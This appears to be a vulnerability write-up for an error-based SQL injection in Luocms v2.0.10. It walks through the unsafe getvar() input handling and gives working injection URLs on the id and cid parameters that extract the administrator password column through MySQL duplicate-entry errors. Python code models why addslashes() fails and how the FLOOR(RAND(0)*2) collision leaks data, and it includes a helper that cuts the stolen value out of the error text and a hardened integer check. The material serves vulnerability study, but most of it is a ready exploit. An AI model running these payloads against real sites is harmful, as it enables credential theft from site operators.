Luocms_v2.0.10 duplicate-entry (error-based) SQL injection

Luocms_v2.0.10

Download: http://down.admin5.com/php/24114.html

Vulnerable file: Luocms/index.php:

<?php
require_once "inc/const.php";

// every request parameter goes through getvar(), which only trims it and runs addslashes()
$id  = getvar("id");
$fid = getvar("fid");
$cid = getvar("cid");
$act = getvar("act");
$p   = getvar("p");
$p   = !empty($p) ? $p : 1;

$p_l = new cls_tpl();
// $id and $cid are handed to the template engine, which builds the queries from them
$p_l->tpl_main($act,$id,$cid,$sitepath,$p);
?>

Let's see how the parameters are fetched. The definition of getvar, in the function file at lines 45-49:

function getvar($var){
    // GET takes precedence over POST; there is no type or whitelist check
    $result = isset($_GET[$var])?$_GET[$var]:$_POST[$var];
    // trim() strips surrounding whitespace; addslashes() only backslash-escapes ' " \ and NUL
    $result = addslashes(trim($result));
    return $result;
}

As you can see, the value is taken straight from GET or POST.

trim() strips the following characters from both ends of the value:

" " (ASCII 32, 0x20), ordinary space
"\t" (ASCII 9, 0x09), tab
"\n" (ASCII 10, 0x0A), line feed
"\r" (ASCII 13, 0x0D), carriage return
"\0" (ASCII 0, 0x00), NUL byte
"\x0B" (ASCII 11, 0x0B), vertical tab

addslashes() escapes ', ", \ and NUL. Against a numeric parameter this filtering is useless, because there is no quote to close: a payload that contains none of those four characters passes through addslashes() completely untouched.
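To make that concrete, here is an added example (not code from Luocms or from the original write-up): a Python re-implementation of getvar()'s trim()+addslashes() path, run against the page's own id payload and, for contrast, against a quoted payload. getvar_int is an assumed hardened replacement for numeric parameters, not anything the project ships.

```python
import re

# PHP trim() default character set: space, \t, \n, \r, NUL, vertical tab
PHP_TRIM_CHARS = " \t\n\r\x00\x0b"


def addslashes(s: str) -> str:
    """Python re-implementation of PHP addslashes(): backslash before ', ", \\ and NUL."""
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def getvar(params: dict, var: str) -> str:
    """Mirror of Luocms' getvar(): raw value, trim(), addslashes(). No type check at all."""
    return addslashes(params.get(var, "").strip(PHP_TRIM_CHARS))


def getvar_int(params: dict, var: str, default: int = 0) -> int:
    """Hypothetical hardened variant for numeric parameters: accept an optionally signed
    integer and nothing else, so no SQL fragment can survive into the query."""
    value = params.get(var, "").strip(PHP_TRIM_CHARS)
    if not re.fullmatch(r"-?\d+", value):
        return default
    return int(value)


# Constructed request values: the error-based id payload from this page, and a
# quoted payload to show the one case addslashes() actually changes.
NUMERIC_PAYLOAD = (
    "1 AND (SELECT 3567 FROM(SELECT COUNT(*),CONCAT(0x7170766271,"
    "(SELECT (ELT(3567=3567,1))),0x71786b6b71,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"
)
STRING_PAYLOAD = "1' OR '1'='1"


def demo() -> dict:
    """Show the asymmetry: the numeric payload survives getvar() byte-for-byte,
    the quoted one gets mangled, and the hardened variant rejects the injection."""
    get = {"id": NUMERIC_PAYLOAD, "cid": STRING_PAYLOAD}
    return {
        "numeric_unchanged": getvar(get, "id") == NUMERIC_PAYLOAD,
        "string_escaped": getvar(get, "cid"),
        "hardened_id": getvar_int(get, "id"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The numeric payload uses hex literals (0x7170766271, 0x71786b6b71) precisely so that no quote character is needed; that is why the addslashes() layer never sees anything to escape.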

Now the definition of tpl_main, template.php lines 7-26:

function tpl_main($act,$id,$cid,$sitepath,$p){
    $tpl_addr = $this->get_tpl($act);
    $temp = $this->load_tpl($tpl_addr);
    $temp = $this->get_include_file($temp);
    // $id and $cid are passed into every tag handler below, still unvalidated
    $temp = $this->get_sys_tag($temp,$id,$cid);
    $temp = $this->get_list_tag($temp,$id,$cid,$p);
    $temp = $this->get_url_path($temp);
    $temp = $this->get_sort_tag($temp,$id,$cid);
    $temp = $this->get_title_tag($temp,$id);
    $temp = $this->get_sitepath($temp,$act,$id,$cid);
    if ($id != ""){
        $temp = $this->get_content_content($temp,$id);
        $temp = $this->get_prv_next($temp,$id);
    }
    echo $temp;
}

Following those calls down is just a long chain of method calls, so the quicker route is to pass values to index.php directly and look at the statements MySQL actually executes.

Building an error-based query:

The injectable parameters are id and cid.

payload:

id=1 AND (SELECT 3567 FROM(SELECT COUNT(*),CONCAT(0x7170766271,(SELECT (ELT(3567=3567,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

cid=1 AND (SELECT 3567 FROM(SELECT COUNT(*),CONCAT(0x7170766271,(SELECT (ELT(3567=3567,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

exploit (reads the password column of luocms.luo_manager, 54 characters at a time, out of the duplicate-entry error message):

index.php?cid=1 AND (SELECT 5188 FROM(SELECT COUNT(*),CONCAT(0x71716b7171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,54) FROM luocms.luo_manager ORDER BY id),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

index.php?id=1 AND (SELECT 5188 FROM(SELECT COUNT(*),CONCAT(0x71716b7171,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,54) FROM luocms.luo_manager ORDER BY id),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
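Why do the payload and the exploit above produce an error at all, and why does that error carry the data? As an added example (not the author's or Luocms' code), the mechanism is modelled in Python: MySQL's RAND(seed) generator is re-implemented from the server's randominit()/my_rnd() routines so that FLOOR(RAND(0)*2) yields the real sequence 0,1,1,0,1,1,..., and a simplified model of the GROUP BY temporary table shows why the key expression is evaluated twice for a new group and collides on the third row. The markers are the ones from the first payload (0x7170766271 and 0x71786b6b71) and the message format is MySQL's "Duplicate entry ... for key ..."; the temp-table model is an assumption about the server's behaviour, labelled as such in the code.

```python
import math

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


class MySQLRand:
    """Re-implementation of MySQL's RAND(seed): randominit() seeding as done by
    Item_func_rand (seed*0x10001+55555555, seed*0x10000001, both as uint32) and my_rnd()."""

    def __init__(self, seed: int):
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def rand(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_times_2(n: int) -> list:
    """First n values of FLOOR(RAND(0)*2). Deterministic because the seed is fixed."""
    g = MySQLRand(0)
    return [math.floor(g.rand() * 2) for _ in range(n)]


PREFIX = bytes.fromhex("7170766271").decode()  # 0x7170766271 from the payload -> 'qpvbq'
SUFFIX = bytes.fromhex("71786b6b71").decode()  # 0x71786b6b71 -> 'qxkkq'


def simulate_group_by(rows: int, data: str) -> dict:
    """Simplified model (an assumption, not server code) of the GROUP BY temp table:
    the key CONCAT(PREFIX, data, SUFFIX, FLOOR(RAND(0)*2)) is evaluated once to look the
    group up and, when the group is new, evaluated a second time for the row that gets
    stored. If that second value already exists, the unique index on the temp table
    raises 'Duplicate entry', and the offending key (with `data` inside) is in the message."""
    g = MySQLRand(0)
    groups: dict = {}
    for _ in range(rows):
        lookup_key = f"{PREFIX}{data}{SUFFIX}{math.floor(g.rand() * 2)}"
        if lookup_key in groups:
            groups[lookup_key] += 1
            continue
        stored_key = f"{PREFIX}{data}{SUFFIX}{math.floor(g.rand() * 2)}"
        if stored_key in groups:
            raise RuntimeError(f"Duplicate entry '{stored_key}' for key 'group_key'")
        groups[stored_key] = 1
    return groups


def duplicate_entry_error(data: str, rows: int = 3):
    """Return the error message the injection produces, or None if the source table is
    too small. INFORMATION_SCHEMA.PLUGINS has far more than three rows, so it always fires."""
    try:
        simulate_group_by(rows, data)
    except RuntimeError as e:
        return str(e)
    return None


def extract_between_markers(message: str) -> str:
    """What the attacker does with the error page: cut the data out from between the markers."""
    start = message.index(PREFIX) + len(PREFIX)
    end = message.index(SUFFIX, start)
    return message[start:end]


if __name__ == "__main__":
    print(floor_rand0_times_2(6))
    msg = duplicate_entry_error("1")
    print(msg)
    print(extract_between_markers(msg))
```

Walking the model through: row 1 looks up key ...0, does not find it, and stores ...1 (second evaluation); row 2 looks up ...1 and finds it; row 3 looks up ...0, misses again, and tries to store ...1, which now collides. That is why the technique needs a source table with at least three rows and why the page's payloads select from INFORMATION_SCHEMA.PLUGINS. The exploit line simply swaps the constant inside the CONCAT for a subquery on luo_manager, so the colliding key, and therefore the error text, contains the password hash.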
